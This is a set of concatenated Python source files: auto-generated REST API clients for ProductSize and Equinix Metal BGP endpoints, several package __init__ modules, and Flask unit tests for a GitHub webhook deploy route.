:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_fk_put_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_size_materials_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_size_materials_fk_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSizeMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_get(self, id, **kwargs):
"""
Queries sizeMaterials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[ProductSizeMaterial]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_size_materials_get_with_http_info(self, id, **kwargs):
"""
Queries sizeMaterials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[ProductSizeMaterial]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ProductSizeMaterial]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_post(self, id, **kwargs):
"""
Creates a new instance in sizeMaterials of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_post_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_post_with_http_info(id, **kwargs)
return data
def product_sizes_id_size_materials_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in sizeMaterials of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_post`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSizeMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_type_get(self, id, **kwargs):
"""
Fetches belongsTo relation type.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_type_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param bool refresh:
:return: ProductType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_type_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_type_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_type_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation type.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_type_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param bool refresh:
:return: ProductType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_type_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_type_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/type'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductType',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_post(self, **kwargs):
"""
Create a new instance of the model and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_post_with_http_info(**kwargs)
else:
(data) = self.product_sizes_post_with_http_info(**kwargs)
return data
def product_sizes_post_with_http_info(self, **kwargs):
"""
Create a new instance of the model and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/ProductSizes'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
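# --- Usage sketch (illustrative, not part of the generated client) ---
# A minimal, hedged example of the two calling conventions documented in the
# docstrings above. `api` is an instance of the generated Api class defined
# earlier in this module (its exact class name is not shown here), and the
# id value is a placeholder.
def demo_size_materials_count(api, product_size_id='example-id'):
    from pprint import pprint
    # Synchronous call: blocks and returns the deserialized response body.
    count = api.product_sizes_id_size_materials_count_get(product_size_id)
    pprint(count)
    # Asynchronous call: passing `callback` makes the method return the
    # request thread and deliver the deserialized response to the callback.
    thread = api.product_sizes_id_size_materials_count_get(
        product_size_id, callback=pprint)
    return thread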
[record boundary: per-file quality statistics for the preceding generated client file omitted]
22577442438a2350d5afcac3cedbaf633136177a | 262 | py | Python | acoular/demo/__init__.py | esarradj/acoular | ed73ab666f994421cfcf8d0b5310a563d99f5f40 | ["BSD-3-Clause"] | 2 stars | 2018-02-04T10:31:31.000Z | 2021-08-23T13:01:38.000Z | issues/forks copy: haoshimaster/acoular | 3f630abde2ffbe1183aefceba2c4f7faa586656a
# coding=UTF-8
#------------------------------------------------------------------------------
# Copyright (c) 2007-2020, Acoular Development Team.
#------------------------------------------------------------------------------
from . import acoular_demo
[record boundary: per-file quality statistics for the preceding file omitted]
226c779a1ca28c2fd888640a543824091ba57f50 | 9,915 | py | Python | tests/test_deploy/TestControllers.py | mukul-mehta/sample-platform | 0fa9345ea46e44ae97aaa4f421e262d5afeca235 | ["0BSD"]
import json
from tempfile import gettempdir
from flask import g
from mock import mock
from mod_deploy.controllers import requests
from tests.base import (BaseTestCase, generate_git_api_header,
generate_signature)
WSGI_ENVIRONMENT = {'REMOTE_ADDR': '0.0.0.0'}
@mock.patch.object(requests, 'get')
class TestControllers(BaseTestCase):
def test_root(self, mock_request_get):
"""
Test the root route of mod_deploy.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
response = self.app.test_client().get('/deploy', environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 200)
self.assertIn("OK", str(response.data))
def test_headers_ping(self, mock_request_get):
"""
Test the view by sending a ping request.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('ping', sig)
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 200)
self.assertIn("Hi", str(response.data))
def test_headers_missing_X_GitHub_Event(self, mock_request_get):
"""
Test missing X-GitHub-Event header.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers.remove('X-GitHub-Event')
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_missing_X_GitHub_Delivery(self, mock_request_get):
"""
Test missing X-GitHub-Delivery header.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers.remove('X-GitHub-Delivery')
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_missing_X_Hub_Signature(self, mock_request_get):
"""
Test missing X-Hub-Signature header.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers.remove('X-Hub-Signature')
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_missing_User_Agent(self, mock_request_get):
"""
Test missing User-Agent header.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers.remove('User-Agent')
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_invalid_User_Agent(self, mock_request_get):
"""
Test a User-Agent header that does not begin with the expected prefix.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
headers['User-Agent'] = "invalid"
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 418)
def test_headers_event_not_push(self, mock_request_get):
"""
Test the view by sending an event other than push.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
sig = generate_signature(str(json.dumps({})).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('pull', sig)
response = self.app.test_client().post('/deploy', headers=headers, environ_overrides=WSGI_ENVIRONMENT)
self.assertEqual(response.status_code, 200)
self.assertIn("Wrong event", str(response.data))
@mock.patch('mod_deploy.controllers.is_valid_signature', return_value=False)
@mock.patch('mod_deploy.controllers.g')
def test_headers_invalid_signature_event(self, mock_g, mock_valid_sign, mock_request_get):
"""
Test the view by sending an event whose signature fails validation.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
self.app.config['INSTALL_FOLDER'] = gettempdir()
data = {
'ref': 'refs/heads/master'
}
sig = generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
with self.app.test_client() as client:
response = client.post(
'/deploy', environ_overrides=WSGI_ENVIRONMENT,
data=json.dumps(data), headers=headers
)
self.assertEqual(response.status_code, 418)
mock_valid_sign.assert_called_once()
mock_g.log.warning.assert_called_once()
mock_request_get.assert_called_once_with('https://api.github.com/meta?client_id=&client_secret=')
@mock.patch('mod_deploy.controllers.is_valid_signature', return_value=True)
@mock.patch('mod_deploy.controllers.g')
def test_headers_no_payload_event(self, mock_g, mock_valid_sign, mock_request_get):
"""
Test the view by sending an event with no payload.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
self.app.config['INSTALL_FOLDER'] = gettempdir()
data = None
sig = generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
with self.app.test_client() as client:
response = client.post(
'/deploy', environ_overrides=WSGI_ENVIRONMENT,
data=json.dumps(data), headers=headers
)
self.assertEqual(response.status_code, 418)
mock_valid_sign.assert_called_once()
mock_g.log.warning.assert_called_once()
mock_request_get.assert_called_once_with('https://api.github.com/meta?client_id=&client_secret=')
@mock.patch('mod_deploy.controllers.is_valid_signature', return_value=True)
@mock.patch('mod_deploy.controllers.g')
def test_headers_not_master_event(self, mock_g, mock_valid_sign, mock_request_get):
"""
Test the view by sending a push event for a branch other than master.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
self.app.config['INSTALL_FOLDER'] = gettempdir()
data = {
'ref': 'refs/heads/not_master'
}
sig = generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
with self.app.test_client() as client:
response = client.post(
'/deploy', environ_overrides=WSGI_ENVIRONMENT,
data=json.dumps(data), headers=headers
)
self.assertEqual(response.status_code, 200)
self.assertIn('Not master', str(response.data))
mock_valid_sign.assert_called_once()
mock_g.log.warning.assert_not_called()
mock_request_get.assert_called_once_with('https://api.github.com/meta?client_id=&client_secret=')
@mock.patch('mod_deploy.controllers.Repo')
@mock.patch('mod_deploy.controllers.is_valid_signature', return_value=True)
@mock.patch('mod_deploy.controllers.subprocess.Popen')
@mock.patch('mod_deploy.controllers.copyfile')
@mock.patch('mod_deploy.controllers.open')
def test_headers_valid_event(self, mock_open, mock_copy, mock_subprocess,
mock_valid_sign, mock_repo, mock_request_get):
"""
Test the view by sending a valid push event to master.
"""
mock_request_get.return_value.json.return_value = {"hooks": ['0.0.0.0']}
self.app.config['INSTALL_FOLDER'] = gettempdir()
data = {
'ref': 'refs/heads/master'
}
sig = generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key'])
headers = generate_git_api_header('push', sig)
# set return for mock_repo
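# mock_pull stands in for a single GitPython pull-info result: a `flags`
# bitmask plus a commit object exposing `hexsha`.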
class mock_pull:
from collections import namedtuple
flags = 128
commit_obj = namedtuple('commit_obj', ['hexsha'])
commit = commit_obj('somesha')
mock_repo.return_value.remote.return_value.fetch.return_value = "valid fetch"
mock_repo.return_value.remote.return_value.pull.return_value = [mock_pull]
with self.app.test_client() as client:
response = client.post(
'/deploy', environ_overrides=WSGI_ENVIRONMENT,
data=json.dumps(data), headers=headers
)
self.assertEqual(response.status_code, 200)
mock_repo.assert_called_once()
mock_open.assert_called_once_with('build_commit.py', 'w')
mock_copy.assert_called_once()
mock_subprocess.assert_called_once_with(["sudo", "service", "platform", "reload"])
self.assertIn("somesha", response.data.decode('utf-8'))
[record boundary: per-file quality statistics for the preceding file omitted]
3f6e78f93977eefdbfad80918679eec8b817dcc3 | 1,011 | py | Python | LocalitySensitiveHashing-1.0.1/LocalitySensitiveHashing/__init__.py | kanihal/CS631_pg_semantic_search | c394783dd2149045e358a47fa6e1313493e23510 | ["BSD-3-Clause"] | 1 star | 2020-10-20T11:48:08.000Z
#!/usr/bin/env python
import sys
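# On Python 3 the nested module must be imported by its full dotted path;
# Python 2 resolved the bare name via implicit relative imports, hence the
# version dispatch below.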
if sys.version_info[0] == 3:
from LocalitySensitiveHashing.LocalitySensitiveHashing import __version__
from LocalitySensitiveHashing.LocalitySensitiveHashing import __author__
from LocalitySensitiveHashing.LocalitySensitiveHashing import __date__
from LocalitySensitiveHashing.LocalitySensitiveHashing import __url__
from LocalitySensitiveHashing.LocalitySensitiveHashing import __copyright__
from LocalitySensitiveHashing.LocalitySensitiveHashing import LocalitySensitiveHashing
from LocalitySensitiveHashing.LocalitySensitiveHashing import DataGenerator
else:
from LocalitySensitiveHashing import __version__
from LocalitySensitiveHashing import __author__
from LocalitySensitiveHashing import __date__
from LocalitySensitiveHashing import __url__
from LocalitySensitiveHashing import __copyright__
from LocalitySensitiveHashing import LocalitySensitiveHashing
from LocalitySensitiveHashing import DataGenerator
[record boundary: per-file quality statistics for the preceding file omitted]
451714fed57fbe27dcfe6002bf953522128f161d | 148 | py | Python | exif/tests/get_file_baselines/__init__.py | ArgiesDario/exif | 62082954e9f7596f0911041b33d835e3df76e306 | ["MIT"]
"""Baseline strings for test_get_file tests."""
from exif.tests.get_file_baselines.modified_noise_file_hex import MODIFIED_NOISE_FILE_HEX_BASELINE
[record boundary: per-file quality statistics for the preceding file omitted]
1898d322db9077e258175f73e5d50784a6fa2c22 | 59,514 | py | Python | metal/models/bgp_api.py | displague/metal-python | 96e64e9ac41025d85ff6f61693165e29e1c366db | ["MIT"] | 3 stars | 2021-09-27T05:10:36.000Z | 2021-09-27T06:10:57.000Z
# coding: utf-8
"""
Metal API
This is the API for Equinix Metal. The API allows you to programmatically interact with all of your Equinix Metal resources, including devices, networks, addresses, organizations, projects, and your user account. The official API docs are hosted at <https://metal.equinix.com/developers/api>. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: support@equinixmetal.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal.api_client import ApiClient
from metal.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class BGPApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_bgp_session(self, id, bgp_session, **kwargs): # noqa: E501
"""Create a BGP session # noqa: E501
Creates a BGP session. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_bgp_session(id, bgp_session, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param bgp_session: BGP session to create (required)
:type bgp_session: BGPSessionInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: BgpSession
"""
kwargs['_return_http_data_only'] = True
return self.create_bgp_session_with_http_info(id, bgp_session, **kwargs) # noqa: E501
def create_bgp_session_with_http_info(self, id, bgp_session, **kwargs): # noqa: E501
"""Create a BGP session # noqa: E501
Creates a BGP session. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_bgp_session_with_http_info(id, bgp_session, async_req=True)
>>> result = thread.get()
:param id: Device UUID (required)
:type id: str
:param bgp_session: BGP session to create (required)
:type bgp_session: BGPSessionInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(BgpSession, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'bgp_session'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_bgp_session" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `create_bgp_session`") # noqa: E501
# verify the required parameter 'bgp_session' is set
if self.api_client.client_side_validation and ('bgp_session' not in local_var_params or # noqa: E501
local_var_params['bgp_session'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `bgp_session` when calling `create_bgp_session`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'bgp_session' in local_var_params:
body_params = local_var_params['bgp_session']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
201: "BgpSession",
401: "Error",
403: "Error",
422: "Error",
}
return self.api_client.call_api(
'/devices/{id}/bgp/sessions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
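    # --- Usage sketch (illustrative comments, not generated code) ---
    # The async_req pattern documented in the docstrings above; `device_id`
    # and `bgp_session_input` are placeholder values:
    #
    #     api = BGPApi()  # uses a default ApiClient unless one is injected
    #     # synchronous: returns the deserialized BgpSession directly
    #     session = api.create_bgp_session(device_id, bgp_session_input)
    #     # asynchronous: returns a handle; .get() blocks until the result arrives
    #     handle = api.create_bgp_session(device_id, bgp_session_input, async_req=True)
    #     session = handle.get()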
def delete_bgp_session(self, id, **kwargs): # noqa: E501
"""Delete the BGP session # noqa: E501
Deletes the BGP session. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_bgp_session(id, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.delete_bgp_session_with_http_info(id, **kwargs) # noqa: E501
def delete_bgp_session_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete the BGP session # noqa: E501
Deletes the BGP session. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_bgp_session_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: BGP session UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
